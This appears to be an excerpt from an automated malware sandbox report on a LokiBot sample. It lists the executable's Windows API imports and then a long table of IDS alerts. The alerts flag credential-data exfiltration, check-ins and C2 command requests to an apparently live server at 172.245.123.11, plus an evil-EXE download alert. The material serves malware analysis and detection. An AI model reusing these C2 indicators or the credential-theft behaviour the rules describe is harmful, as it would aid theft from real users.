LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                                              USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                              GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                              COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                              ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                              SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                              ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                              OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
                                                              Language of compilation systemCountry where language is spokenMap
                                                              EnglishGreat Britain
                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                              2025-01-07T11:01:56.715463+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549704172.245.123.1180TCP
                                                              2025-01-07T11:01:56.715463+01002025381ET MALWARE LokiBot Checkin1192.168.2.549704172.245.123.1180TCP
                                                              2025-01-07T11:01:56.715463+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549704172.245.123.1180TCP
                                                              2025-01-07T11:01:57.233864+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.549704172.245.123.1180TCP
                                                              2025-01-07T11:01:57.382609+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549705172.245.123.1180TCP
                                                              2025-01-07T11:01:57.382609+01002025381ET MALWARE LokiBot Checkin1192.168.2.549705172.245.123.1180TCP
                                                              2025-01-07T11:01:57.382609+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549705172.245.123.1180TCP
                                                              2025-01-07T11:01:57.878406+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.549705172.245.123.1180TCP
                                                              2025-01-07T11:01:57.943923+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549706172.245.123.1180TCP
                                                              2025-01-07T11:01:57.943923+01002025381ET MALWARE LokiBot Checkin1192.168.2.549706172.245.123.1180TCP
                                                              2025-01-07T11:01:57.943923+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549706172.245.123.1180TCP
                                                              2025-01-07T11:01:58.458090+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549706172.245.123.1180TCP
                                                              2025-01-07T11:01:58.458090+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549706172.245.123.1180TCP
                                                              2025-01-07T11:01:58.646333+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549708172.245.123.1180TCP
                                                              2025-01-07T11:01:58.646333+01002025381ET MALWARE LokiBot Checkin1192.168.2.549708172.245.123.1180TCP
                                                              2025-01-07T11:01:58.646333+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549708172.245.123.1180TCP
                                                              2025-01-07T11:01:59.167458+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549708172.245.123.1180TCP
                                                              2025-01-07T11:01:59.167458+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549708172.245.123.1180TCP
                                                              2025-01-07T11:01:59.172328+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549708TCP
                                                              2025-01-07T11:01:59.326148+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549709172.245.123.1180TCP
                                                              2025-01-07T11:01:59.326148+01002025381ET MALWARE LokiBot Checkin1192.168.2.549709172.245.123.1180TCP
                                                              2025-01-07T11:01:59.326148+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549709172.245.123.1180TCP
                                                              2025-01-07T11:01:59.826437+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549709172.245.123.1180TCP
                                                              2025-01-07T11:01:59.826437+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549709172.245.123.1180TCP
                                                              2025-01-07T11:01:59.826461+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549709TCP
                                                              2025-01-07T11:01:59.975652+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549710172.245.123.1180TCP
                                                              2025-01-07T11:01:59.975652+01002025381ET MALWARE LokiBot Checkin1192.168.2.549710172.245.123.1180TCP
                                                              2025-01-07T11:01:59.975652+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549710172.245.123.1180TCP
                                                              2025-01-07T11:02:00.489975+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549710172.245.123.1180TCP
                                                              2025-01-07T11:02:00.489975+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549710172.245.123.1180TCP
                                                              2025-01-07T11:02:00.495096+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549710TCP
                                                              2025-01-07T11:02:00.675299+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549711172.245.123.1180TCP
                                                              2025-01-07T11:02:00.675299+01002025381ET MALWARE LokiBot Checkin1192.168.2.549711172.245.123.1180TCP
                                                              2025-01-07T11:02:00.675299+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549711172.245.123.1180TCP
                                                              2025-01-07T11:02:00.833300+01002022053ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M21194.15.112.248443192.168.2.549707TCP
                                                              2025-01-07T11:02:01.182301+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549711172.245.123.1180TCP
                                                              2025-01-07T11:02:01.182301+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549711172.245.123.1180TCP
                                                              2025-01-07T11:02:01.192750+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549711TCP
                                                              2025-01-07T11:02:01.372775+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549712172.245.123.1180TCP
                                                              2025-01-07T11:02:01.372775+01002025381ET MALWARE LokiBot Checkin1192.168.2.549712172.245.123.1180TCP
                                                              2025-01-07T11:02:01.372775+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549712172.245.123.1180TCP
                                                              2025-01-07T11:02:01.907867+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549712172.245.123.1180TCP
                                                              2025-01-07T11:02:01.907867+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549712172.245.123.1180TCP
                                                              2025-01-07T11:02:01.907960+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549712TCP
                                                              2025-01-07T11:02:02.102743+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549714172.245.123.1180TCP
                                                              2025-01-07T11:02:02.102743+01002025381ET MALWARE LokiBot Checkin1192.168.2.549714172.245.123.1180TCP
                                                              2025-01-07T11:02:02.102743+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549714172.245.123.1180TCP
                                                              2025-01-07T11:02:02.634049+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549714172.245.123.1180TCP
                                                              2025-01-07T11:02:02.634049+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549714172.245.123.1180TCP
                                                              2025-01-07T11:02:02.638895+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549714TCP
                                                              2025-01-07T11:02:02.801547+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549715172.245.123.1180TCP
                                                              2025-01-07T11:02:02.801547+01002025381ET MALWARE LokiBot Checkin1192.168.2.549715172.245.123.1180TCP
                                                              2025-01-07T11:02:02.801547+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549715172.245.123.1180TCP
                                                              2025-01-07T11:02:03.321041+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549715172.245.123.1180TCP
                                                              2025-01-07T11:02:03.321041+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549715172.245.123.1180TCP
                                                              2025-01-07T11:02:03.325869+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549715TCP
                                                              2025-01-07T11:02:03.617744+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549716172.245.123.1180TCP
                                                              2025-01-07T11:02:03.617744+01002025381ET MALWARE LokiBot Checkin1192.168.2.549716172.245.123.1180TCP
                                                              2025-01-07T11:02:03.617744+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549716172.245.123.1180TCP
                                                              2025-01-07T11:02:04.082310+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549716172.245.123.1180TCP
                                                              2025-01-07T11:02:04.082310+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549716172.245.123.1180TCP
                                                              2025-01-07T11:02:04.088778+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549716TCP
                                                              2025-01-07T11:02:04.247901+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549717172.245.123.1180TCP
                                                              2025-01-07T11:02:04.247901+01002025381ET MALWARE LokiBot Checkin1192.168.2.549717172.245.123.1180TCP
                                                              2025-01-07T11:02:04.247901+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549717172.245.123.1180TCP
                                                              2025-01-07T11:02:04.772127+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549717172.245.123.1180TCP
                                                              2025-01-07T11:02:04.772127+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549717172.245.123.1180TCP
                                                              2025-01-07T11:02:04.776954+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549717TCP
                                                              2025-01-07T11:02:04.955089+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549718172.245.123.1180TCP
                                                              2025-01-07T11:02:04.955089+01002025381ET MALWARE LokiBot Checkin1192.168.2.549718172.245.123.1180TCP
                                                              2025-01-07T11:02:04.955089+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549718172.245.123.1180TCP
                                                              2025-01-07T11:02:05.483094+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549718172.245.123.1180TCP
                                                              2025-01-07T11:02:05.483094+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549718172.245.123.1180TCP
                                                              2025-01-07T11:02:05.483351+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549718TCP
                                                              2025-01-07T11:02:05.693265+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549719172.245.123.1180TCP
                                                              2025-01-07T11:02:05.693265+01002025381ET MALWARE LokiBot Checkin1192.168.2.549719172.245.123.1180TCP
                                                              2025-01-07T11:02:05.693265+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549719172.245.123.1180TCP
                                                              2025-01-07T11:02:06.191450+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549719172.245.123.1180TCP
                                                              2025-01-07T11:02:06.191450+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549719172.245.123.1180TCP
                                                              2025-01-07T11:02:06.199216+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549719TCP
                                                              2025-01-07T11:02:06.454475+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549720172.245.123.1180TCP
                                                              2025-01-07T11:02:06.454475+01002025381ET MALWARE LokiBot Checkin1192.168.2.549720172.245.123.1180TCP
                                                              2025-01-07T11:02:06.454475+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549720172.245.123.1180TCP
                                                              2025-01-07T11:02:06.944182+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549720172.245.123.1180TCP
                                                              2025-01-07T11:02:06.944182+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549720172.245.123.1180TCP
                                                              2025-01-07T11:02:06.949892+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549720TCP
                                                              2025-01-07T11:02:07.167908+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549721172.245.123.1180TCP
                                                              2025-01-07T11:02:07.167908+01002025381ET MALWARE LokiBot Checkin1192.168.2.549721172.245.123.1180TCP
                                                              2025-01-07T11:02:07.167908+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549721172.245.123.1180TCP
                                                              2025-01-07T11:02:07.693898+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549721172.245.123.1180TCP
                                                              2025-01-07T11:02:07.693898+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549721172.245.123.1180TCP
                                                              2025-01-07T11:02:07.698697+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549721TCP
                                                              2025-01-07T11:02:07.855998+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549722172.245.123.1180TCP
                                                              2025-01-07T11:02:07.855998+01002025381ET MALWARE LokiBot Checkin1192.168.2.549722172.245.123.1180TCP
                                                              2025-01-07T11:02:07.855998+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549722172.245.123.1180TCP
                                                              2025-01-07T11:02:08.371774+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549722172.245.123.1180TCP
                                                              2025-01-07T11:02:08.371774+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549722172.245.123.1180TCP
                                                              2025-01-07T11:02:08.376604+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549722TCP
                                                              2025-01-07T11:02:08.543768+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549723172.245.123.1180TCP
                                                              2025-01-07T11:02:08.543768+01002025381ET MALWARE LokiBot Checkin1192.168.2.549723172.245.123.1180TCP
                                                              2025-01-07T11:02:08.543768+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549723172.245.123.1180TCP
                                                              2025-01-07T11:02:09.043689+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549723172.245.123.1180TCP
                                                              2025-01-07T11:02:09.043689+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549723172.245.123.1180TCP
                                                              2025-01-07T11:02:09.048487+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549723TCP
                                                              2025-01-07T11:02:09.203966+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549724172.245.123.1180TCP
                                                              2025-01-07T11:02:09.203966+01002025381ET MALWARE LokiBot Checkin1192.168.2.549724172.245.123.1180TCP
                                                              2025-01-07T11:02:09.203966+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549724172.245.123.1180TCP
                                                              2025-01-07T11:02:09.690323+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549724172.245.123.1180TCP
                                                              2025-01-07T11:02:09.690323+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549724172.245.123.1180TCP
                                                              2025-01-07T11:02:09.690347+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549724TCP
                                                              2025-01-07T11:02:09.860003+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549725172.245.123.1180TCP
                                                              2025-01-07T11:02:09.860003+01002025381ET MALWARE LokiBot Checkin1192.168.2.549725172.245.123.1180TCP
                                                              2025-01-07T11:02:09.860003+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549725172.245.123.1180TCP
                                                              2025-01-07T11:02:10.371491+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549725172.245.123.1180TCP
                                                              2025-01-07T11:02:10.371491+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549725172.245.123.1180TCP
                                                              2025-01-07T11:02:10.376291+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549725TCP
                                                              2025-01-07T11:02:10.546688+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549727172.245.123.1180TCP
                                                              2025-01-07T11:02:10.546688+01002025381ET MALWARE LokiBot Checkin1192.168.2.549727172.245.123.1180TCP
                                                              2025-01-07T11:02:10.546688+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549727172.245.123.1180TCP
                                                              2025-01-07T11:02:11.080195+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549727172.245.123.1180TCP
                                                              2025-01-07T11:02:11.080195+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549727172.245.123.1180TCP
                                                              2025-01-07T11:02:11.080304+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549727TCP
                                                              2025-01-07T11:02:11.233719+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549730172.245.123.1180TCP
                                                              2025-01-07T11:02:11.233719+01002025381ET MALWARE LokiBot Checkin1192.168.2.549730172.245.123.1180TCP
                                                              2025-01-07T11:02:11.233719+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549730172.245.123.1180TCP
                                                              2025-01-07T11:02:11.739564+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549730172.245.123.1180TCP
                                                              2025-01-07T11:02:11.739564+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549730172.245.123.1180TCP
                                                              2025-01-07T11:02:11.744334+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549730TCP
                                                              2025-01-07T11:02:11.958150+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549732172.245.123.1180TCP
                                                              2025-01-07T11:02:11.958150+01002025381ET MALWARE LokiBot Checkin1192.168.2.549732172.245.123.1180TCP
                                                              2025-01-07T11:02:11.958150+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549732172.245.123.1180TCP
                                                              2025-01-07T11:02:12.466482+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549732172.245.123.1180TCP
                                                              2025-01-07T11:02:12.466482+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549732172.245.123.1180TCP
                                                              2025-01-07T11:02:12.471383+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549732TCP
                                                              2025-01-07T11:02:12.617821+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549734172.245.123.1180TCP
                                                              2025-01-07T11:02:12.617821+01002025381ET MALWARE LokiBot Checkin1192.168.2.549734172.245.123.1180TCP
                                                              2025-01-07T11:02:12.617821+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549734172.245.123.1180TCP
                                                              2025-01-07T11:02:13.113940+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549734172.245.123.1180TCP
                                                              2025-01-07T11:02:13.113940+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549734172.245.123.1180TCP
                                                              2025-01-07T11:02:13.119052+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549734TCP
                                                              2025-01-07T11:02:13.258855+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549736172.245.123.1180TCP
                                                              2025-01-07T11:02:13.258855+01002025381ET MALWARE LokiBot Checkin1192.168.2.549736172.245.123.1180TCP
                                                              2025-01-07T11:02:13.258855+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549736172.245.123.1180TCP
                                                              2025-01-07T11:02:13.753938+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549736172.245.123.1180TCP
                                                              2025-01-07T11:02:13.753938+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549736172.245.123.1180TCP
                                                              2025-01-07T11:02:13.758672+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549736TCP
                                                              2025-01-07T11:02:13.915720+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549738172.245.123.1180TCP
                                                              2025-01-07T11:02:13.915720+01002025381ET MALWARE LokiBot Checkin1192.168.2.549738172.245.123.1180TCP
                                                              2025-01-07T11:02:13.915720+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549738172.245.123.1180TCP
                                                              2025-01-07T11:02:14.420666+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549738172.245.123.1180TCP
                                                              2025-01-07T11:02:14.420666+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549738172.245.123.1180TCP
                                                              2025-01-07T11:02:14.425478+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549738TCP
                                                              2025-01-07T11:02:14.575614+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549739172.245.123.1180TCP
                                                              2025-01-07T11:02:14.575614+01002025381ET MALWARE LokiBot Checkin1192.168.2.549739172.245.123.1180TCP
                                                              2025-01-07T11:02:14.575614+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549739172.245.123.1180TCP
                                                              2025-01-07T11:02:15.079219+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549739172.245.123.1180TCP
                                                              2025-01-07T11:02:15.079219+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549739172.245.123.1180TCP
                                                              2025-01-07T11:02:15.088894+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549739TCP
                                                              2025-01-07T11:02:15.241631+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549740172.245.123.1180TCP
                                                              2025-01-07T11:02:15.241631+01002025381ET MALWARE LokiBot Checkin1192.168.2.549740172.245.123.1180TCP
                                                              2025-01-07T11:02:15.241631+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549740172.245.123.1180TCP
                                                              2025-01-07T11:02:15.751764+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549740172.245.123.1180TCP
                                                              2025-01-07T11:02:15.751764+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549740172.245.123.1180TCP
                                                              2025-01-07T11:02:15.752303+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549740TCP
                                                              2025-01-07T11:02:15.898264+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549741172.245.123.1180TCP
                                                              2025-01-07T11:02:15.898264+01002025381ET MALWARE LokiBot Checkin1192.168.2.549741172.245.123.1180TCP
                                                              2025-01-07T11:02:15.898264+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549741172.245.123.1180TCP
                                                              2025-01-07T11:02:16.407319+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549741172.245.123.1180TCP
                                                              2025-01-07T11:02:16.407319+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549741172.245.123.1180TCP
                                                              2025-01-07T11:02:16.412071+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549741TCP
                                                              2025-01-07T11:02:16.561248+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549742172.245.123.1180TCP
                                                              2025-01-07T11:02:16.561248+01002025381ET MALWARE LokiBot Checkin1192.168.2.549742172.245.123.1180TCP
                                                              2025-01-07T11:02:16.561248+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549742172.245.123.1180TCP
                                                              2025-01-07T11:02:17.070038+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549742172.245.123.1180TCP
                                                              2025-01-07T11:02:17.070038+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549742172.245.123.1180TCP
                                                              2025-01-07T11:02:17.074803+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549742TCP
                                                              2025-01-07T11:02:17.278413+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549748172.245.123.1180TCP
